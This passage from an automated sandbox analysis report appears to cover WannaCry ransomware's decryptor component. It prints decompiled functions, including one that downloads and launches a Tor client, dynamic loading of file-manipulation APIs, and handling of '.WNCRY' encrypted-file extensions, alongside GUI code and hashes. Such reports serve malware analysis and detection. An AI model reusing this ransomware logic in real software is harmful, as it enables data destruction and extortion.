                                  							CopyFileA( &_v520,  &_v1040, 0);
                                  							goto L8;
                                  						} else {
                                  							return 0;
                                  						}
                                  					} else {
                                  						_push(0);
                                  						_t55 = E0040B780( &_v1040, "TaskData", "https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip");
                                  						_t86 = _t86 + 0xc;
                                  						if(_t55 != 0) {
                                  							goto L5;
                                  						} else {
                                  							_push(0);
                                  							_t56 = E0040B780( &_v1040, "TaskData", 0x4221ac);
                                  							_t86 = _t86 + 0xc;
                                  							if(_t56 != 0) {
                                  								goto L5;
                                  							} else {
                                  								return _t56;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

















                                  APIs
                                  • sprintf.MSVCRT ref: 0040B87A
                                  • GetFileAttributesA.KERNEL32(?,?,?,?,00000000,?), ref: 0040B88D
                                  • CreateProcessA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9AA
                                    • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000000,0019FA30), ref: 0040B6B4
                                    • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  • sprintf.MSVCRT ref: 0040B924
                                  • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934
                                    • Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,0019FA30), ref: 0040B793
                                    • Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                    • Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                    • Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                    • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
                                  • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9CF
                                  • WaitForSingleObject.KERNEL32(?,00007530,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9E2
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9EF
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9F6
                                    • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete$Create$AttributesCloseDirectoryHandleObjectSingleWaitsprintf$CacheCopyDownloadEntryNameProcessTemp
                                  • String ID: %s\%s\%s$D$TaskData$Tor$https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry$taskhsvc.exe$tor.exe
                                  • API String ID: 4284242699-3937372533
                                  • Opcode ID: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                  • Instruction ID: 35d80fb58dc1195f77b7b167f0129d00e9adf464e01d9889cd120ecf7352bd78
                                  • Opcode Fuzzy Hash: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                  • Instruction Fuzzy Hash: 0C4137716443007AD710DBA4EC41BEBB7D4AFE8700F90883FF698532E1D6B99548879E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 69%
                                  			E004032C0(intOrPtr __ecx) {
                                  				intOrPtr _t16;
                                  				long _t17;
                                  				struct HFONT__* _t19;
                                  				long _t20;
                                  				long _t21;
                                  				long _t23;
                                  				int _t35;
                                  				int _t38;
                                  				int _t40;
                                  				int _t47;
                                  				intOrPtr _t48;
                                  
                                  				_t48 = __ecx;
                                  				L00412CB0();
                                  				_t16 =  *0x42189c; // 0x19f608
                                  				_t17 =  *(_t16 + 0x824);
                                  				 *(__ecx + 0xe8) = _t17;
                                  				_push(CreateSolidBrush(_t17));
                                  				L00412D5E();
                                  				_t47 = __ecx + 0xec;
                                  				_t19 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
                                  				_push(_t19);
                                  				L00412D5E();
                                  				_push(0x408);
                                  				L00412CE6();
                                  				if(_t47 != 0) {
                                  					_t35 =  *(_t47 + 4);
                                  				} else {
                                  					_t35 = 0;
                                  				}
                                  				_t20 = SendMessageA( *(_t19 + 0x20), 0x30, _t35, 1);
                                  				_push(0x409);
                                  				L00412CE6();
                                  				if(_t47 != 0) {
                                  					_t38 =  *(_t47 + 4);
                                  				} else {
                                  					_t38 = 0;
                                  				}
                                  				_t21 = SendMessageA( *(_t20 + 0x20), 0x30, _t38, 1);
                                  				_push(2);
                                  				L00412CE6();
                                  				if(_t47 != 0) {
                                  					_t40 =  *(_t47 + 4);
                                  				} else {
                                  					_t40 = 0;
                                  				}
                                  				_t23 = SendMessageA( *(_t21 + 0x20), 0x30, _t40, 1);
                                  				_push(0x40e);
                                  				L00412CE6();
                                  				if(_t47 != 0) {
                                  					_t47 =  *(_t47 + 4);
                                  				}
                                  				SendMessageA( *(_t23 + 0x20), 0x30, _t47, 1);
                                  				E00403CB0(_t48);
                                  				SendMessageA( *(_t48 + 0xc0), 0x14e, 0, 0);
                                  				_push(0xffffffff);
                                  				_push(0xffffffff);
                                  				_push(0);
                                  				_push("Path");
                                  				_push(0);
                                  				L00412D58();
                                  				SendMessageA( *(_t48 + 0x80), 0x101e, 0, 0x1f4);
                                  				 *0x4217bc = _t48;
                                  				return 1;
                                  			}















                                  APIs
                                  • #4710.MFC42 ref: 004032C5
                                  • CreateSolidBrush.GDI32(?), ref: 004032DC
                                  • #1641.MFC42(00000000), ref: 004032E9
                                  • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
                                  • #1641.MFC42(00000000), ref: 0040331F
                                  • #3092.MFC42(00000408,00000000), ref: 0040332B
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
                                  • #3092.MFC42(00000409), ref: 00403353
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
                                  • #3092.MFC42(00000002), ref: 00403372
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
                                  • #3092.MFC42(0000040E), ref: 00403394
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
                                  • #3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
                                  • SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092$#1641Create$#3996#4710BrushFontSolid
                                  • String ID: Arial$Path
                                  • API String ID: 2448086372-1872211634
                                  • Opcode ID: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                  • Instruction ID: b960ea7794e319caf0268359e71fff6d42033abaa4d887be80586a06fbef81fd
                                  • Opcode Fuzzy Hash: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                  • Instruction Fuzzy Hash: 4831D5B13907107BE6249760CD83FAE6659BB84B10F20421EB756BF2D1CEF8AD41879C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00402C40() {
                                  				_Unknown_base(*)()* _t11;
                                  				struct HINSTANCE__* _t23;
                                  
                                  				if(E00404B70() == 0) {
                                  					L12:
                                  					return 0;
                                  				} else {
                                  					if( *0x4217a0 == 0) {
                                  						_t23 = LoadLibraryA("kernel32.dll");
                                  						if(_t23 == 0) {
                                  							goto L12;
                                  						} else {
                                  							 *0x4217a0 = GetProcAddress(_t23, "CreateFileW");
                                  							 *0x4217a4 = GetProcAddress(_t23, "WriteFile");
                                  							 *0x4217a8 = GetProcAddress(_t23, "ReadFile");
                                  							 *0x4217ac = GetProcAddress(_t23, "MoveFileW");
                                  							 *0x4217b0 = GetProcAddress(_t23, "MoveFileExW");
                                  							 *0x4217b4 = GetProcAddress(_t23, "DeleteFileW");
                                  							_t11 = GetProcAddress(_t23, "CloseHandle");
                                  							 *0x4217b8 = _t11;
                                  							if( *0x4217a0 == 0 ||  *0x4217a4 == 0 ||  *0x4217a8 == 0 ||  *0x4217ac == 0 ||  *0x4217b0 == 0 ||  *0x4217b4 == 0 || _t11 == 0) {
                                  								goto L12;
                                  							} else {
                                  								return 1;
                                  							}
                                  						}
                                  					} else {
                                  						return 1;
                                  					}
                                  				}
                                  			}






                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
                                  • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
                                  • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
                                  • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
                                  • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
                                  • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
                                  • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
                                  • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                  • API String ID: 2238633743-1294736154
                                  • Opcode ID: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                  • Instruction ID: a2b5d8bb757b14b28e15fb80ad1863100e1319e91a413c2d323d0fcc62a15203
                                  • Opcode Fuzzy Hash: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                  • Instruction Fuzzy Hash: AA110334B423216BD734AB25BD58FA72695EFD4701795003FA801E76E1D7B89C42CA5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E00408D70(intOrPtr __ecx, signed long long __fp0, intOrPtr* _a4, int _a8, signed int _a12, unsigned int _a16, signed int _a20) {
                                  				intOrPtr _v0;
                                  				unsigned int _v4;
                                  				unsigned int _v8;
                                  				unsigned int _v12;
                                  				intOrPtr _v20;
                                  				char _v36;
                                  				intOrPtr _v56;
                                  				char _v60;
                                  				intOrPtr _v64;
                                  				char _v68;
                                  				unsigned int _v72;
                                  				signed int _v76;
                                  				signed int _v80;
                                  				intOrPtr _v84;
                                  				signed int _v88;
                                  				signed int _v92;
                                  				signed int _v96;
                                  				signed long long _v100;
                                  				intOrPtr _v104;
                                  				void* _v108;
                                  				void* _v112;
                                  				void* _v120;
                                  				unsigned int _t93;
                                  				signed int _t96;
                                  				signed int _t100;
                                  				unsigned int _t102;
                                  				signed int _t107;
                                  				int _t112;
                                  				char _t113;
                                  				signed char _t115;
                                  				RECT* _t122;
                                  				signed int _t125;
                                  				signed int _t134;
                                  				intOrPtr* _t135;
                                  				unsigned int _t138;
                                  				signed int _t140;
                                  				signed int _t143;
                                  				intOrPtr* _t146;
                                  				char _t151;
                                  				char _t152;
                                  				signed int _t169;
                                  				intOrPtr* _t177;
                                  				signed int _t192;
                                  				intOrPtr* _t193;
                                  				intOrPtr _t195;
                                  				unsigned int _t202;
                                  				char _t209;
                                  				intOrPtr _t210;
                                  				signed long long _t228;
                                  				signed long long _t229;
                                  				signed long long _t230;
                                  				signed long long _t231;
                                  				signed long long _t234;
                                  
                                  				_t228 = __fp0;
                                  				_push(0xffffffff);
                                  				_push(E004140A0);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t210;
                                  				_t93 = _a20;
                                  				_v104 = __ecx;
                                  				_t138 = _a16;
                                  				_t169 = _t138 & 0x000000ff;
                                  				_v76 = _t169;
                                  				_t192 = (_t93 & 0x000000ff) - _t169;
                                  				_t140 = _t138 >> 0x00000010 & 0x000000ff;
                                  				_t96 = (_t93 >> 0x00000010 & 0x000000ff) - _t140;
                                  				_v88 = 0;
                                  				_v96 = _t96;
                                  				_v92 = _t140;
                                  				asm("cdq");
                                  				_t143 = _t96 ^ 0;
                                  				_v100 = 0;
                                  				asm("cdq");
                                  				_a20 = _t192;
                                  				_t134 = 0;
                                  				if(0 <= _t143) {
                                  					_t134 = _t143;
                                  				}
                                  				asm("cdq");
                                  				_t100 = _t192 ^ 0;
                                  				if(_t100 <= _t134) {
                                  					_a16 = 0;
                                  					if(0 <= _t143) {
                                  						_a16 = _t143;
                                  					}
                                  				} else {
                                  					_a16 = _t100;
                                  				}
                                  				_t193 = _a8;
                                  				_t102 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
                                  				if(_t102 < _a16) {
                                  					_a16 = _t102;
                                  				}
                                  				if(_a16 == 0) {
                                  					_a16 = 1;
                                  				}
                                  				asm("fild dword [esp+0x88]");
                                  				asm("fild dword [esp+0x8c]");
                                  				_t135 = _a4;
                                  				_t229 = _t228 / st1;
                                  				_v80 = _t229;
                                  				asm("fild dword [esp+0x1c]");
                                  				_t230 = _t229 / st1;
                                  				_v100 = _t230;
                                  				asm("fild dword [esp+0x20]");
                                  				_t231 = _t230 / st1;
                                  				_v96 = _t231;
                                  				st0 = _t231;
                                  				_t107 = GetDeviceCaps( *( *_t135 + 8), 0x26) & 0x00000100;
                                  				_v80 = _t107;
                                  				if(_t107 == 0 && _a8 > 1) {
                                  					_t125 = GetDeviceCaps( *( *_t135 + 8), 0xc);
                                  					if(GetDeviceCaps( *( *_t135 + 8), 0xe) * _t125 < 8) {
                                  						_v8 = 1;
                                  					}
                                  				}
                                  				_t146 = _t193;
                                  				_a12 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
                                  				_t202 = 0;
                                  				asm("fild dword [esp+0x8c]");
                                  				_v72 = 0;
                                  				_v68 =  *_t146;
                                  				_v76 = 0x415a44;
                                  				asm("fidiv dword [esp+0x88]");
                                  				_v64 =  *((intOrPtr*)(_t146 + 4));
                                  				_v60 =  *((intOrPtr*)(_t146 + 8));
                                  				_v56 =  *((intOrPtr*)(_t146 + 0xc));
                                  				_a12 = _t231;
                                  				_t112 = _a8;
                                  				_v12 = 0;
                                  				_v4 = 0;
                                  				if(_t112 <= 0) {
                                  					L31:
                                  					_v76 = 0x415c00;
                                  					_v12 = 1;
                                  					L00412D52();
                                  					 *[fs:0x0] = _v20;
                                  					return _t112;
                                  				} else {
                                  					while(1) {
                                  						asm("fild dword [esp+0x7c]");
                                  						_t195 =  *_t193;
                                  						L0041304A();
                                  						_t46 = _t202 + 1; // 0x1
                                  						_v4 = _t46;
                                  						_t209 = _t112 + _t195;
                                  						asm("fild dword [esp+0x7c]");
                                  						_v68 = _t209;
                                  						_t234 = st0 * _a12 * _a12;
                                  						L0041304A();
                                  						_t113 = _t112 + _t195;
                                  						_v60 = _t113;
                                  						if(_t202 == _a8 - 1) {
                                  							_t113 =  *((intOrPtr*)(_v0 + 8));
                                  							_v60 = _t113;
                                  						}
                                  						_t177 = _a4;
                                  						_t151 =  *_t177;
                                  						if(_t113 < _t151) {
                                  							goto L29;
                                  						}
                                  						if(_t209 < _t151) {
                                  							_v68 = _t151;
                                  						}
                                  						_t152 =  *((intOrPtr*)(_t177 + 8));
                                  						if(_t113 > _t152) {
                                  							_v60 = _t152;
                                  						}
                                  						L0041304A();
                                  						_v92 = 0;
                                  						L0041304A();
                                  						_t115 = _t113 + _v100 + _v96;
                                  						_v92 = _t115 << 8;
                                  						L0041304A();
                                  						_push(_t115 + _v84 & 0x000000ff | _v92);
                                  						if(_v80 == 0) {
                                  							_t112 = E00409D40( &_v36, _t135,  &_v68);
                                  							_push(_t112);
                                  							L00412FF2();
                                  						} else {
                                  							_push(CreateSolidBrush());
                                  							L00412D5E();
                                  							_t122 = E00409D40( &_v60, _t135,  &_v76);
                                  							_t76 =  &_v96; // 0x415a44
                                  							asm("sbb ecx, ecx");
                                  							_t112 = FillRect( *( *_t135 + 4), _t122,  ~_t76 & _v92);
                                  							L00412D52();
                                  						}
                                  						if(_v68 <  *((intOrPtr*)(_v4 + 8))) {
                                  							L30:
                                  							_t202 = _v4;
                                  							_t112 = _a8;
                                  							_v4 = _t202;
                                  							if(_t202 < _t112) {
                                  								_t193 = _v0;
                                  								continue;
                                  							}
                                  						}
                                  						goto L31;
                                  						L29:
                                  						st0 = _t234;
                                  						goto L30;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _ftol$CapsDevice$#2414$#1641#2754BrushCreateFillRectSolid
                                  • String ID: DZA
                                  • API String ID: 2487345631-3378329814
                                  • Opcode ID: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                  • Instruction ID: dda82c2241e8f2351b86cfb5efeedf8da928c70a362fdc9ee550b763b14e0e54
                                  • Opcode Fuzzy Hash: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                  • Instruction Fuzzy Hash: 2CA147716087418FC324DF25C984AAABBE1FFC8704F148A2EF599D7291DA39D845CF86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E00404DD0(void* __ecx) {
                                  				intOrPtr _t12;
                                  				long _t13;
                                  				struct HFONT__* _t15;
                                  				long _t16;
                                  				long _t17;
                                  				int _t29;
                                  				int _t32;
                                  				int _t35;
                                  
                                  				L00412CB0();
                                  				_t12 =  *0x42189c; // 0x19f608
                                  				_t13 =  *(_t12 + 0x824);
                                  				 *(__ecx + 0x6c) = _t13;
                                  				_push(CreateSolidBrush(_t13));
                                  				L00412D5E();
                                  				_t35 = __ecx + 0x70;
                                  				_t15 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
                                  				_push(_t15);
                                  				L00412D5E();
                                  				_push(0x403);
                                  				L00412CE6();
                                  				if(_t35 != 0) {
                                  					_t29 =  *(_t35 + 4);
                                  				} else {
                                  					_t29 = 0;
                                  				}
                                  				_t16 = SendMessageA( *(_t15 + 0x20), 0x30, _t29, 1);
                                  				_push(1);
                                  				L00412CE6();
                                  				if(_t35 != 0) {
                                  					_t32 =  *(_t35 + 4);
                                  				} else {
                                  					_t32 = 0;
                                  				}
                                  				_t17 = SendMessageA( *(_t16 + 0x20), 0x30, _t32, 1);
                                  				_push(2);
                                  				L00412CE6();
                                  				if(_t35 != 0) {
                                  					SendMessageA( *(_t17 + 0x20), 0x30,  *(_t35 + 4), 1);
                                  					return 1;
                                  				} else {
                                  					SendMessageA( *(_t17 + 0x20), 0x30, _t35, 1);
                                  					return 1;
                                  				}
                                  			}

                                  APIs
                                  • #4710.MFC42 ref: 00404DD5
                                  • CreateSolidBrush.GDI32(?), ref: 00404DE9
                                  • #1641.MFC42(00000000), ref: 00404DF3
                                  • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
                                  • #1641.MFC42(00000000), ref: 00404E26
                                  • #3092.MFC42(00000403,00000000), ref: 00404E32
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
                                  • #3092.MFC42(00000001), ref: 00404E57
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
                                  • #3092.MFC42(00000002), ref: 00404E76
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092$#1641Create$#4710BrushFontSolid
                                  • String ID: Arial
                                  • API String ID: 1126252797-493054409
                                  • Opcode ID: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                  • Instruction ID: f8dd995afa615cab71677879a74d6ff7c2e305333cbfc3da3be905e2a6067967
                                  • Opcode Fuzzy Hash: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                  • Instruction Fuzzy Hash: CC21C6B13507107FE625A764DD86FAA2759BBC8B40F10011EB345AB2D1CAF5EC41879C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E00402560(intOrPtr __ecx, WCHAR* _a4) {
                                  				short _v720;
                                  				intOrPtr _v724;
                                  				void* _t21;
                                  				void* _t22;
                                  				WCHAR* _t23;
                                  				void* _t30;
                                  				short* _t31;
                                  				intOrPtr* _t32;
                                  				void* _t34;
                                  				void* _t36;
                                  
                                  				_t23 = _a4;
                                  				_v724 = __ecx;
                                  				_t30 = 0;
                                  				wcscpy( &_v720, _t23);
                                  				_t31 = wcsrchr( &_v720, 0x2e);
                                  				_t34 =  &_v724 + 0x10;
                                  				if(_t31 == 0) {
                                  					L4:
                                  					wcscat( &_v720, L".org");
                                  				} else {
                                  					_t32 = __imp___wcsicmp;
                                  					_t21 =  *_t32(_t31, L".WNCRY");
                                  					_t36 = _t34 + 8;
                                  					if(_t21 == 0) {
                                  						L3:
                                  						 *_t31 = 0;
                                  						_t30 = 1;
                                  					} else {
                                  						_t22 =  *_t32(_t31, L".WNCYR");
                                  						_t34 = _t36 + 8;
                                  						if(_t22 != 0) {
                                  							goto L4;
                                  						} else {
                                  							goto L3;
                                  						}
                                  					}
                                  				}
                                  				if(E004020A0(_v724, _t23,  &_v720) == 0) {
                                  					DeleteFileW( &_v720);
                                  					goto L11;
                                  				} else {
                                  					if(DeleteFileW(_t23) == 0) {
                                  						L11:
                                  						return 0;
                                  					} else {
                                  						if(_t30 != 0) {
                                  							return 1;
                                  						} else {
                                  							return MoveFileW( &_v720, _t23);
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete_wcsicmp$Movewcscatwcscpywcsrchr
                                  • String ID: .WNCRY$.WNCYR$.org
                                  • API String ID: 1016768320-4283512309
                                  • Opcode ID: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                  • Instruction ID: 8e688c7c8c2018b5eb76f9bfe5eaf8fc18d5300b1d9ff01e022ce9e0f1e53e02
                                  • Opcode Fuzzy Hash: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                  • Instruction Fuzzy Hash: 29219576240301ABD220DB15FE49BEB7799DBD4711F44483BF901A2280EB7DD90987BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E00412360(signed int __ecx, signed int _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				void* _v0;
                                  				char _v260;
                                  				struct _FILETIME _v268;
                                  				struct _FILETIME _v276;
                                  				struct _FILETIME _v284;
                                  				void* _v292;
                                  				void* _v296;
                                  				signed int _v304;
                                  				char _v560;
                                  				struct _OVERLAPPED* _v820;
                                  				void* _v824;
                                  				void* _v827;
                                  				void* _v828;
                                  				long _v829;
                                  				void* _v836;
                                  				intOrPtr _t68;
                                  				long _t77;
                                  				void* _t81;
                                  				void* _t82;
                                  				void* _t90;
                                  				void* _t91;
                                  				long _t94;
                                  				signed int _t97;
                                  				long _t99;
                                  				void* _t106;
                                  				int _t116;
                                  				long _t121;
                                  				signed int _t132;
                                  				signed int _t138;
                                  				unsigned int _t140;
                                  				signed int _t141;
                                  				void* _t154;
                                  				intOrPtr* _t157;
                                  				intOrPtr _t166;
                                  				void* _t174;
                                  				signed int _t175;
                                  				signed int _t176;
                                  				long _t177;
                                  				signed int _t178;
                                  				signed int _t179;
                                  				intOrPtr* _t180;
                                  				void* _t182;
                                  				long _t183;
                                  				intOrPtr* _t185;
                                  				void* _t187;
                                  				void* _t191;
                                  				void* _t192;
                                  
                                  				_t166 = _a16;
                                  				_t132 = __ecx;
                                  				if(_t166 == 3) {
                                  					_t68 =  *((intOrPtr*)(__ecx + 4));
                                  					_t176 = _a4;
                                  					__eflags = _t176 - _t68;
                                  					if(_t176 == _t68) {
                                  						L14:
                                  						_t177 = E00411810( *_t132, _a8, _a12,  &_v829);
                                  						__eflags = _t177;
                                  						if(_t177 <= 0) {
                                  							E00411AC0( *_t132);
                                  							 *(_t132 + 4) = 0xffffffff;
                                  						}
                                  						__eflags = _v829;
                                  						if(_v829 == 0) {
                                  							__eflags = _t177;
                                  							if(_t177 <= 0) {
                                  								asm("sbb eax, eax");
                                  								_t77 = 0x1000 + ( ~(_t177 - 0xffffff96) & 0x04fff000);
                                  								__eflags = _t77;
                                  								return _t77;
                                  							} else {
                                  								return 0x600;
                                  							}
                                  						} else {
                                  							__eflags = 0;
                                  							return 0;
                                  						}
                                  					} else {
                                  						__eflags = _t68 - 0xffffffff;
                                  						if(_t68 != 0xffffffff) {
                                  							E00411AC0( *((intOrPtr*)(__ecx)));
